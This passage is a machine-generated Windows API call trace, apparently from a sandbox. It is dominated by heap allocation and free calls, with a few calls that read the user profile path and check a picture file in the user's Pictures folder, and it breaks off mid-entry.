[0210.485] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.488] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.493] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ko-PEUGJ.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bd0190, ftCreationTime.dwHighDateTime=0x1d5cc81, ftLastAccessTime.dwLowDateTime=0xb18eb580, ftLastAccessTime.dwHighDateTime=0x1d5cbfa, ftLastWriteTime.dwLowDateTime=0xb18eb580, ftLastWriteTime.dwHighDateTime=0x1d5cbfa, nFileSizeHigh=0x0, nFileSizeLow=0x8c04, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-PEUGJ.png", cAlternateFileName="")) returned 0x9e1d38 [0210.493] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 